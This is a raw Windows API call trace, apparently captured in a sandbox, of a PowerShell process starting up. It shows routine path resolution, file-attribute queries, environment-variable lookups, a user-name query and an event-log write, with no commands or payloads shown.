	[0844.658] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0844.658] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0844.659] CoTaskMemAlloc (cb=0x20e) returned 0x29f570
	[0844.659] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x29f570 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0844.659] CoTaskMemFree (pv=0x29f570) 
	[0844.663] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0844.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.663] CoTaskMemFree (pv=0x2b4b30) 
	[0844.664] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0844.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.664] CoTaskMemFree (pv=0x2b4b30) 
	[0845.741] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0845.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.742] CoTaskMemFree (pv=0x2b4b30) 
	[0845.743] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0845.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.743] CoTaskMemFree (pv=0x2b4b30) 
	[0845.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.744] SetErrorMode (uMode=0x1) returned 0x1
	[0845.744] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.744] SetErrorMode (uMode=0x1) returned 0x1
	[0845.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.745] SetErrorMode (uMode=0x1) returned 0x1
	[0845.745] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.745] SetErrorMode (uMode=0x1) returned 0x1
	[0845.745] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0845.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.745] CoTaskMemFree (pv=0x2b4b30) 
	[0845.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.748] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.748] SetErrorMode (uMode=0x1) returned 0x1
	[0845.748] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0845.749] SetErrorMode (uMode=0x1) returned 0x1
	[0845.749] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.749] SetErrorMode (uMode=0x1) returned 0x1
	[0845.749] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0845.749] SetErrorMode (uMode=0x1) returned 0x1
	[0845.749] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.749] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.749] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.750] SetErrorMode (uMode=0x1) returned 0x1
	[0845.750] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.750] SetErrorMode (uMode=0x1) returned 0x1
	[0845.750] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.750] SetErrorMode (uMode=0x1) returned 0x1
	[0845.750] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.750] SetErrorMode (uMode=0x1) returned 0x1
	[0845.750] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.751] SetErrorMode (uMode=0x1) returned 0x1
	[0845.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.751] SetErrorMode (uMode=0x1) returned 0x1
	[0845.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.751] SetErrorMode (uMode=0x1) returned 0x1
	[0845.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.751] SetErrorMode (uMode=0x1) returned 0x1
	[0845.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.752] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.752] SetErrorMode (uMode=0x1) returned 0x1
	[0845.752] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.752] SetErrorMode (uMode=0x1) returned 0x1
	[0845.752] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.753] SetErrorMode (uMode=0x1) returned 0x1
	[0845.753] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.753] SetErrorMode (uMode=0x1) returned 0x1
	[0845.753] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.753] SetErrorMode (uMode=0x1) returned 0x1
	[0845.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.754] SetErrorMode (uMode=0x1) returned 0x1
	[0845.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.754] SetErrorMode (uMode=0x1) returned 0x1
	[0845.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.754] SetErrorMode (uMode=0x1) returned 0x1
	[0845.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.758] SetErrorMode (uMode=0x1) returned 0x1
	[0845.758] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d7b0 | out: lpFileInformation=0x16d7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.758] SetErrorMode (uMode=0x1) returned 0x1
	[0845.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.100] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0847.100] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16db18 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16db18) returned 0x1
	[0847.100] CoTaskMemFree (pv=0x1b754fa0) 
	[0847.100] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0847.100] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16db58 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16db58) returned 1
	[0847.101] CoTaskMemFree (pv=0x25aca0) 
	[0847.102] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34a4ca0*="Available", lpRawData=0x34a4a30) returned 1
	[0847.663] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0847.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.663] CoTaskMemFree (pv=0x2b4b30) 
	[0847.665] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0847.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.665] CoTaskMemFree (pv=0x2b4b30) 
	[0847.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.671] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0847.671] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0847.671] CoTaskMemFree (pv=0x2b4b30) 
	[0847.671] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0847.671] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0847.671] CoTaskMemFree (pv=0x2b4b30) 
	[0847.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.673] GetCurrentProcessId () returned 0x518
	[0847.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
